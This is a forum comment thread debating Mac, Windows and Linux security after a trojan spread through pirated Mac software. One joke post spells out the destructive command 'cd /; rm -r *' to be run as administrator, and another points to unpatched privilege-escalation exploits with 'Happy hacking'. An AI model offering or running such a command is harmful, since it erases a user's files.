First things first, I have Linux, OS X, and Windows floating around my house on various machines. Secondly, as a longtime PC user (notice I did not specify which OS), I ALWAYS check anything I download from the internet, heck, I even check some software I bought from a brick and mortar store for malware. Every system in my house has an antivirus software on it, all my windows systems have anti-spyware stuff out the wazoo running, (if you know of any Mac ones, let me know) and even my Mac is set up to scan something I just downloaded before executing it. This is way overkill on my part probably since I am behind a dial up connection, so a botnet isn't exactly useful to the operator from here (not to mention my phone cords are normally unplugged, long story and lesson learned.) BUT, I have yet to have an issue with any malware around my house. I grew up at a high school as the unofficial tech guy and saw what happened to reasonable sized networks as malware got a hold in it, and as a result I vowed not to let it happen to any of my machines. Also, all the anti-malware software I'm running is only as good as the user; if someone were to disable it and do visit some nefarious stuff on my computers they would go down too. That's why I'm admin and nobody else in the household has a sudo/admin/supervisor account. So far, so good! In summary: Security through obscurity is NEVER something to be relied upon. Security is only as good as the user's intelligence will let it be and in continuance, You can't fix stupid.
Symantec is just trying to drum up more sales.
The more people fear their computers might be "infected," the more antivirus software they sell.
Is there anything a Mac can't do?
*drops dead from amazement*
Down With Slashdot BETA!!! I've been around the corner and seen the oliphant; you can only abuse me from your perspecti
man you got it all wrong. it is a feature and a very necessary one at that. mac users must be told that they are as fucked as any win user.
Wealth is the gift that keeps on giving.
What version of NT was it? 4? Of course Geek Squad didn't exist when NT4 existed.
Yes, NT4. I ordered it in December 1997 and tried to run Windows Update in January 2000. The Windows Update site said I had to order a CD with the update. And Geek Squad did exist then, Geek Squad was established in 1994.
Falcon
Should there be a Law?
Don't you mean an iDIOT?
I have had a 'test and destroy' PC that I use to try different *nix distros, and usually have WINE and ies4linux installed. .wine, or even appears to happen. Been trying this for about two years now, and no success to date.
Every bit of crap that hits the news, or I stumble across, I try to run it with WINE or open IE 6 and go to that sight. Other than IE 6 and/or WINE crashing, I've not been able to detect any malware actually making an install. Usually nothing even makes it to the c:/windows/temp folder in
I won't say that it can't happen, just that with every GNU/Linux distro** I've tried: no go. YMMV
**Fedora, Red Hat, CENT OS, Mandrake, Mandriva, Suse, Mint, Ubuntu, Kubuntu...those are the ones I remember.
Down With Slashdot BETA!!! I've been around the corner and seen the oliphant; you can only abuse me from your perspecti
The real problem with Windows is that most users have administrator rights over their machine. Something which I.T. is completely at fault for not training users how on the safe way of operating a computer.
In Linux there is "sudo", in OSX the user is prompted for credentials when installing an application or changing the "locked" status on a control panel applet. In Windows the option is to use the "run as" option in the context menu. Something which we as computer geeks have failed to communicate and educate computer users.
Most of the time a computer has a problem with malware it is due to a problem with "layer 8" not having been trained properly.
Mac botnet DoS attack?
Thats like an acopalypse caused by undead squirrels.
No.
The only way to do it is to change it in the registry, reboot, get the blue screen, do a repair install, and then it'll work.
I suppose, in theory, somebody could make a utility that would do it, but it would be a massive amount of work, as it would have to search not only the registry, but also .ini and .bat/.cmd files to make sure no paths were hard coded, and also probably some proprietary binary config files for some programs that would break if you didn't fix them.
Then there's probably also be a bunch of REG_BINARY keys in the registry that would need to be updated, and who knows how that data is encoded. REG_SZ would be easy enough, though....
"City hall" in German is "Rathaus" Kinda explains a few things......
Zombie Mac: Braaaaiiiinnnssss
Mac fanboy: Joke's on you, I have none
(I'm going to mod point hell for this one)
Help fight spam
And there's no such thing as a hardware firewall.
I saw a malware infection on a Windows XP machine recently, where the vast majority of it was done with the task scheduler and batch files.
Pretty impressive, really.
Although the author was a bit of an idiot, and the single piece that was an exe file was supposed to be downloaded from an FTP server, and the batch script to do the download had a bug in it. Duuh.
It did manage to keep turning off the firewall every 15 minutes, though.....
"City hall" in German is "Rathaus" Kinda explains a few things......
90% of the problems on Windows are attributed to users installing malicious software. This is what Mac users go about claiming they are immune to, which is ridiculous.
You misinterpret the statements "macs don't have viruses" as meaning "they cannot have viruses". As in, there are none currently...
As you say, any system can have malware. But we now have ONE example of malware on a mac, that you catch by pirating CS4. So how does that compare with the count of the PC?
It's not that macs cannot have malware, it's just that statistically there is none compared to PC's. I can still give a Mac to my mother and not have to worry what she will catch on the internet because effectively, there's nothing to catch...
That will change over time by how long before it's even in the same order of magnitude as Windows exploits?
"There is more worth loving than we have strength to love." - Brian Jay Stanley
Really, thats so insignificant that doesn't matters in the big scheme of things. Certainly, the Mac fanboys that believe that their Macs are inmune to malware make a fool of themshelves, but it is way easier and faster to secure a Mac or a Linux install than a Windows install. For starters, even Windows Vista shows a red alert if you aren't running antivirus software.
But really, I'm impressed that they found people fool enough to download from a dubious source iWork09 when they have the faster and safer option to download it from the Apple website iteself. Pirating Photoshop CS4 is short of understandable, its price goes around 30-50% of the price of the lowest end Mac hardware. This was bound to happen, and one of the reasons that I suggest my Mac user friends to not pirate software or install any random software that they found on the web.
The sad part is that the people affected by this troyan almost surelly could have found the infection if they checked the logs of their own system. This is a case were stupidity really sould be more painful, for their own good.
Mexico: 100% conservative's America now!
Almost no Windows malware these days is self spreading. Almost all spread the same way, social engineering. So your statement can be generalized to any platform where people double click things they download on the Internet.
How do you determine "trustworthiness" when downloading files? Unless you compare the cryptographic hash of every file you download against the cryptographic hash posted to the https:// equivalent of the server, or the installer itself is signed by a credible signing authority (very little Mac software is codesigned) there's absolutely no way you can know whether what you've just downloaded is safe or not.
Just because you downloaded it from a "safe" web site means nothing--the Web site itself could have been hacked. This is how a lot of Windows malware is distributed. Heck two years ago the Web site for Dolphin stadium was hacked so that the download for the driving directions to the stadium was a trojan.
If IE always asked you to click something, then it would be safe. Exactly how the hell would you create an OS that you can actually install anything on while preventing you from installing something that MIGHT be bad? After all, if I want to install a spam program, that is my business. There after all plenty of legimate reasons to send mass emails. Yes really.
As for rootkit like software. It is your PC, you might have a reason for it. Security software be it anti-virus or DRM often needs to nest itself deep into the OS as well. If that is what the user wants, that is what the user should be able to do.
IE gets slammed because it allows installs without user activation. As soon as a "hack" requires user action then it is no longer an OS/software vulnerability but a social engineering one.
We don't blame money for being insecure because of pyramid schemes do we? We blame money for being insecure when it can be counterfitted, not when humans can be duped with their money.
MMO Quests are like orgasms:
You may solo them, I prefer them in a group.
That's why he typed "steadily becoming".
This is the sig that says NI (again)
Wow, that straw man must have put up a real big fight. Who said it was a vulnerability?
"It does not do to leave a live dragon out of your calculations, if you live near him." - Tolkien
I recall when I last used Windows Defender, it actually has VNC listed for those reasons.
Change is certain; progress is not obligatory.
So it's not FUD. Mac users who are not savvy can certainly get malware. If you know what you're doing, and stay away from P2P or other downloads you can't identify as "good," you're fairly safe (more so than unpatched Windows, for sure). But you're not immortal, and this article is proof of it. Even if it is from a fearmonger with self-interest like Symantec.
Mac users who are not savvy didn't get this malware. It was users who were just clever enough to be a danger to themselves and their environment and not clever enough to be safe. They had to be savvy enough to download the software from a torrent. 90^ of users are not savvy enough to do this. 8% of the users know how to do it, but are savvy enough not to do it. There is the two percent in the middle that caused the problem.
On pre-Vista Windows boxes, most people ran their default account with godlike administrator privileges. It's either that or:
Run a restricted account
Any time you want to install software
DO:
log out of your restricted account
log into the admin account
install the software
then go back to your restricted account.
REPEAT
At least in w2k and xp, you have a run as... in your context menue
So in order to become part of this botnet, I do nothing but go to a pirated software site, download contaminated software and then install it as administrator. Since when was it news that most software on pirated sites contain malware.
/var/temp/[RANDOM FILE NAME]. It will then prompt the user for root credentials in order to execute it
When 'Adobe CS4 Crack(intel)' is executed, the Trojan extracts its main component to the following location:
From: Symantec
To: Macuser
Subject: software update
Dear valued customer, please login as administrator fire up the CLI, then type cd /; rm -r *, and then post me out your bank account details and your sorting code.
signed: Mac Malware (ZDNET dept)
Somewhere in the headers of the packets... "Hai guyz imma Mac!"
There are over 36 million lines of COBOL code in the world, and they are all raping children.
...because "they just work"
"Mac viruses would delay the eject until they had fully infected the floppy"
Yea, an when ya wuz out o' da room, da floppy would crawl across da room an ooze its way into da cruize, all without ya havin ta do anyfink what 'chew trippin foo
As a long-time Mac (and PC) user myself, I've been known to give someone a "simplified version" of the truth, telling them "you won't have any virus or spyware problems on a Mac".
It's not that I'm some clueless user who doesn't know better. It's that I have a pretty good idea of what the individual does with and expects from their computer. Judging by that, and knowing they're not a very "technical" user to begin with, I know that practically speaking, they really aren't going to need to worry about infections on their Mac.
(So far, just about all of the trojan horses and viruses people mentioned for OS X involved downloading files of unknown origins, or running something you received in an unsolicited email. When you have a user who is already scared to open any email at all from people he/she doesn't know, they're hopefully in good shape there. They're certainly not savvy enough to fire up bittorrent and start seeking out pirated software, either.)
But they are sometimes savvy enough to open chain e-mails from people they do know.
The dangers of hypersimplification extend beyond the death of precision and loss of credibility: they carry straight to the continued promotion of ignorance.
If you dumb technology down for a user, all you get is a dumb user.
Why guys insist on downloading questionable things without some preventive measures in place, first, is beyond the scope of my tired head. But dumping Apple's default 5-minute "grace period" on sudo (or admin passwords, in other words) will kill third-party attempts to piggyback on any password that is being used by the legit user for privilege escalation.
In a console (Terminal):
[hit return, enter password]
scroll to: #Defaults specification, hit the letter 'o' to get a new line, and type:
then hit [Escape] to end the editing session, then ':w' plus [Enter] to write the file to disk, and finally ':q' plus [Enter] to quit visudo.
Done. I get tired of vi, of course, and will usually use BBEdit to open /private/etc/sudoers and enter the admin password once to 'unlock' sudoers, then scroll down and add the new default line, and save the file. Done, quicker.
A nefarious app or script can poll the system asking if there's escalation until kingdom come and it will never get an affirmative. End of story; end of file
now DoS-ing in style.
YOU FORGOT FREEBSD!
That will come in handy for something, someday. All 20 of them just sitting there, waiting to pounce on some poor Win IIS web server.
Doctors destroy health, lawyers destroy justice, universities destroy knowledge, religion destroys spirituality
The proliferation of MacOS installations has crossed into PC-land. The software that seems to have been the cause is free with new Apples. Could they all be pirate OSX users ?
Well, I've setup Debian for family members, and from that experience I'd like to say you may be wrong. On windows I have to let them install applications from random places, because that's the only way to get software on that platform. On debian I show them "Add/Remove Applications"... It is very easy for even non-experts to understand that software from "Add/Remove" is good, but software from the web is possibly a bad idea.
You say the problem is not in the OS, I say the problem can be seriously mitigated by the operating system (distribution) design. The same people who had very little ability to spot malware on windows never end up in that same problem on Debian.
Now, I'm sure someone will start the old "so what will the average user do when the app is not in the repository? huh? huh?" at this point. IMO, the answer is and always has been "they won't use the app then or will wait for an admin to install it". That is the price you pay for convenience and security.
Your lack of knowledge is showing.
This attack did not involve a virus. Users unknowingly downloaded a malevolent program, i.e., a program to turn their machine into a zombie in a DOS campaign. That's a con, not a virus.
If you use OS X, you are, in fact, much less likely to be attacked by a virus, by malware, or whatever. Some credit for that goes to OS X, but most of the credit goes to the fact that there are many fewer Macs on the planet.
Folks who insist a Mac is magically invulnerable are demonstrating that don't know what they are talking about.
We all know this. Why is it being rehashed here?
-- Slashdot: When Public Access TV Says "No"
You are correct to a point. The Windows OS family has had a lot of attack vectors that don't require user intervention - worms and such - as well as many many vulnerabilities in tools like the default browser and email client. Mac and Linux systems have had far fewer of these vulnerabilities. A reasonably hardened XP system with the firewall turned on, various services turned off, and using Mozilla products instead of IE and Outlook Express is reasonably secure.
No, the funny part is that the users who torrented and installed pirated copies of iWork 09 and Photoshop CS4 got exactly what they deserved. Instant karma.
Why do idiots keep mislabeling their music as w4r3z? Here I wanted photoshop and all I got was a shitty John Lennon song.
... as IT folks have been known to say.
"Problem Exists Between Keyboard And Chair"
"No matter how cynical you get, it is impossible to keep up." -- Lily Tomlin
Sorry, how does conficker spread again?
Conflicker wasn't spread by users, it was spread by superusers.
One of our competitors trademarked the term "hypothesis". From now on, we will call them "boneheaded ideas".
If you are installing software from untrusted source all bets are off.
The general assumption should be "This is untrusted source, hence this is malware until proven otherwise".
So, if you really really wanted the software badly, you either install the software in virtual machine and study it, or on real isolated hardware and test it as much as you can (and in the end you could still be wrong).
Any user that thinks otherwise will eventually get infected no matter what OS they use.
As the island of our knowledge grows, so does the shore of our ignorance.
Granted, it's theoretically possible ... but what's the alternative in this case? You go into detail trying to explain to the (now glassy-eyed) user all the potential sneaky ways someone might get a virus onto their Mac, despite the marketing they heard about Macs not having the virus/spyware problems of a Windows PC?
All that's going to accomplish in most cases is the user walking away with nothing more than some vague idea that "this computer geek tells me all the advertising is a lie, so I guess the Mac isn't any good after all". Then they'll stick with Windows and be at FAR greater risk of spyware/virus problems.
Reality is, OS X doesn't let you run as "root" in normal operation of the operating system. Most Windows users, by contrast, run as "Administrator" with full access to everything. (Yeah, that's changing with Vista, but their security model still annoys enough people so they sometimes override it and go back to running as administrator all the time, like XP did.)
I'm shocked... someone wasted their time to make a mac bug. Must have just been someone sick of hearing it, because that's ineffective at best. Maybe in a few years when the population gets up a bit more, but now? Pfft... not enough mac's around to do any good.
It really all comes back to the shaving analogy.
Macs are like electric razors: Most expensive for the hardware, with easy to use interface for the least technically inclined folks. But if it breaks, the average user is going to throw their hands in the air, throw it away, and buy a new one.
Windows are like disposable razors: Moderate everything, with a median level of profeciency required for safe and practical operation. If something goes wrong, it's usually a matter of replacing whatever wore out.
Linux is like a straight razor: Maximum skill required, but maximum results in the end. Definately a learned skill, and pretty much nothing will fall into your lap unearned. And if you mess it up, FUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU-
I think that is naive. As the market share for Macs increase, they will be an increasingly attractive target. And you set all these people up thinking they were safe. It's this attitude that is going to bite Mac users hard soon. You should always teach people how to use AV/firewalls/anti-spyware and let them know what kind of activities are bad ideas. Even if you are under the illusion that Macs are more secure, you don't know what other computers they interact with.
Support a great indie game: http://www.abaddon360.com
but most understand that the Mac platform gets fewer instances of malware in the wild because their platform is less popular, and that "fewer" is not the same thing as "none". There are — of course — Mac users who do not understand this distinction.
On a related note, can you imagine the humiliation of whoever owns that web site? "LOL, UR WEBZ GOT WTFPWNZORED BY MACS"
Does the Mac botnet have a more simple and intuitive UI than comparable Windows-based botnets? My grandma is a script kiddie, this sounds like the perfect system for her.
The root problem is currently solved by some new privilege escalation exploits for OS X:
http://slashdot.org/firehose.pl?op=view&id=4200037
"Several exploits for Apple's Mac OS X are in circulation which have not yet been patched. In a short test carried out by the heise Security editorial team, one of the exploits allowed a Mac OS X 10.5.6 user with normal privileges to obtain root privileges."
This security flaw has not been patched yet. Happy hacking everyone!
Luckily I run Windows, or I might have gotten a virus, too!
I am not devoid of humor.
.... They're certainly not savvy enough to fire up bittorrent and start seeking out pirated software, either.)
No, but their kids might.
You don't need to be root to run a botnet node. There's plenty of places to hide an exploit... and security is like sex... once you're penetrated you're ****ed.
So internal firewalls like root/Administrator accounts are nice, but not getting penetrated in the first place is the best prevention. Trying to keep malware that's already running contained? That's a sucker game.
Apple finally made "Open Safe Files After Downloading" default to off, but if you upgraded Safari, make sure that that's off. Install a dedicated FTP client and stop using Finder as the handler for FTP: URLs.
And for god's sake... don't install pirated software. Back before Microsoft made the "Good Times" virus real with "ActiveX", the number one mechanism for virus transmission was people who trusted software downloads, or were otherwise "social engineered" into running malware voluntarily. And that's a mechanism that ALWAYS works. No matter what the OS does.
Most of the PC viruses, malware, spyware and trojans I've seen and cleaned (or tried to clean) are from people downloading and installing stuff they shouldn't have. I guess the lesson is, all the root password protection in the world isn't going to save some (a lot of) people.
"Steadily becoming" would imply if not come out directly and say OS X is becoming more vulnerable.
Falcon
Should there be a Law?
The alternative is honesty. Telling someone they won't have any problems, ever, is a complete lie. I may as well tell my children that they won't contract any venereal diseases if they remember to bring a condom. Granted, telling someone with the attention span of a fly the exact details of why and how and blah blah blah...not the best approach. But it doesn't cost anything to say "look, nothing is 100% secure but this is probably enough to deal with everything you'll encounter for the next five years."
The OS X approach to root access and its integration of BSD is excellent, and part of why I use Macs frequently. But it still isn't a guarantee, and end users deserve to know that. If the user is never educated, they remain vulnerable to every social engineering trick in the book and most phishing, fake software, and related scams.
The only way I would promise no virus/spyware problems is with a computer that never goes live.
Vista's attempts at security are a weak attempt at reassurance, and deserve to be scrapped. I'd rather use XP - something that doesn't pretend to have Unix under the hood - or OS X, which has Unix under the hood. But this is for many of the same reasons as my reasoning behind warning users about risks.
The illusion of security is more dangerous than a lack of security.
Is OS X more secure than any Windows version? Absolutely. Impervious? Of course not. Should every user know this? Of course.
enlarge your penis! defend a mac!
Nobody got what they deserved. The shitheads who dl'd the trojan don't even notice it, which is why it works. Random people with bad luck are the ones who will notice it, and they didn't deserve it.
I often thought Adobe and the other popular hack targets should take an approach like this to discourage illegal dling, even though I don't care if they do or not, as I'm also a pirate from time to time. It would be the best way to thwart, if there were direct consequences, like a trojan that trashed the pirate machine. But this is totally displaced here, not that it's Adobe or Apple doing it.
And this has nothing to do with the OS, btw. Not that I care about that either.
Idioten Kaufen Eben Alles (Nicht)